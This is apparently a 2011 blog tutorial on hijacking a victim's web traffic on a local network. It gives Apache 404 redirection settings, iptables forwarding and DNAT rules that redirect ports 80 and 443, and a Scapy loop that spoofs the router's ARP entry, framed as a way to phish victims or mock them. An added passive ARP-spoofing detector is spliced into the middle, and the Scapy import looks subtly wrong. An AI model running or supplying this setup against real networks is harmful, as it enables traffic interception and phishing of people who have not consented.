October 9, 2011 at 12:00 PM
In this article, I will explain how to intercept and control the web (HTTP/S) traffic of one or more hosts within a local area network. The attack itself is rather simple. First, an attacker poisons the ARP cache of a victim's workstation, effectively making the attacker a man in the middle between the victim and the router. Next, the victim generates some sort of web traffic, which is intercepted by the attacker and redirected to an HTTP server controlled by the attacker. This opens up the possibility of anything from a simple MITM phishing scheme to a network-wide Rick Roll.
[ Prerequisites ]
Before we begin, you'll need the following:
Note: If you don't have a Linux workstation handy, then the Backtrack live CD is your best friend.
[ Step 1: Configure HTTP Server ]
There are only two things you need to configure on your HTTP server. First, set your index page to whatever you want your victim to see. Next, and this is crucial, you need to set your index page as the page displayed for 404 errors. On Apache you do this by opening the httpd.conf file and searching for "ErrorDocument 404", which should bring you to a line that looks like:
#ErrorDocument 404 /missing.html
You want to change this line to:
ErrorDocument 404 /news.py
The reason this is needed is that if a victim requests something like "http://myspace.com/index.cfm?fuseaction=user", they'll still be redirected to your intended page instead of the standard 404 error page.
[ Step 2: Configuring iptables ]
The next step is to configure iptables to accept incoming traffic on a network interface and to forward that traffic either to the router or to your HTTP server. This is done with the following commands:
# These first four commands enable traffic forwarding, and tell iptables to accept traffic
# arriving on interface eth0 and to forward it back out interface eth0.
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects
iptables --append FORWARD --in-interface eth0 --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 --jump MASQUERADE
# These next two commands tell iptables to change the destination address of any traffic
# received on TCP port 80 or 443 to the IP address of your HTTP server.
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination HTTP_Server_IP
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination HTTP_Server_IP
[ Step 3: Poison The ARP Cache ]
Now that you've configured your system, it's finally time to carry out the attack! How you carry out this step is really up to you. All you need to do is poison the target's ARP cache so that the IP address of the router points to your workstation. There are many tools out there that can be used to accomplish this task; however, in this tutorial I will be using Python and the Scapy module. Open up your Python interpreter and enter the following commands.
>>> import scapy, time                 # imports the scapy and time modules
>>> a = scapy.ARP()                    # creates an ARP packet object
>>> a.psrc = "192.168.1.1"             # sets the 'from' IP address to the router's
>>> a.pdst = "192.168.1.12"            # the leech's IP address
>>> while 1:
...     scapy.send(a)                  # sends the packet
...     time.sleep(90)                 # sleeps for 90 seconds, then sends the packet again
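From the other side of the wire, the poisoning in Step 3 has one tell-tale symptom: the router's IP address suddenly being announced by a different MAC, repeated on a timer. The following passive detector, added here as an illustrative example and not part of the original article, walks a list of observed ARP replies and flags exactly that, optionally checking against a known-good IP-to-MAC baseline (static ARP entries or a DHCP lease table) and also flagging one MAC answering for several IPs. The sample replies are constructed: the IPs follow the article's 192.168.1.0/24 example and the MACs are invented.

```python
from collections import defaultdict

# Constructed sample of ARP replies (opcode 2) as a passive monitor on the LAN would
# record them. Fields: seconds since start, sender IP (psrc), sender MAC (hwsrc),
# target IP (pdst). MAC addresses are made up for the example.
SAMPLE_ARP_REPLIES = [
    (0,   "192.168.1.1",  "00:11:22:33:44:01", "192.168.1.12"),  # real router answering a request
    (2,   "192.168.1.12", "00:11:22:33:44:0C", "192.168.1.1"),   # the workstation answering
    (30,  "192.168.1.1",  "00:11:22:33:44:AA", "192.168.1.12"),  # router IP now announced by a third MAC
    (120, "192.168.1.1",  "00:11:22:33:44:AA", "192.168.1.12"),  # repeated on a 90 s timer, as in Step 3
    (125, "192.168.1.12", "00:11:22:33:44:0C", "192.168.1.1"),
]

def detect_arp_spoofing(replies, baseline=None, protected_ips=("192.168.1.1",)):
    """Return a list of alert strings for IP->MAC conflicts in a sequence of ARP replies.

    baseline: optional dict of IP -> MAC known to be correct (static ARP entries or a
    DHCP lease table). IPs not in it are learned from the first reply seen for them.
    A conflict on a protected IP (the gateway) is rated HIGH, anything else MEDIUM.
    A second check flags a single MAC answering for more than one IP address.
    """
    ip_to_mac = {ip: mac.lower() for ip, mac in (baseline or {}).items()}
    mac_to_ips = defaultdict(set)
    alerts = []
    for t, ip, mac, target in replies:
        mac = mac.lower()
        known = ip_to_mac.setdefault(ip, mac)   # learn on first sight, keep the baseline otherwise
        if known != mac:
            sev = "HIGH" if ip in protected_ips else "MEDIUM"
            alerts.append(f"[{sev}] t={t}s: {ip} announced by {mac}, expected {known} (sent to {target})")
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"[MEDIUM] t={t}s: {mac} answers for {sorted(mac_to_ips[mac])}")
    return alerts

if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print(line)
```

On a live network the same function can be fed from packets captured with an `arp` filter, and Dynamic ARP Inspection on a managed switch prevents the poisoning rather than merely reporting it.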
[ Finale ]
Finally, you have finished your attack. You now have full control of your target's web traffic. Feel free to laugh maniacally at whatever dark horrors you've just exposed your victim to.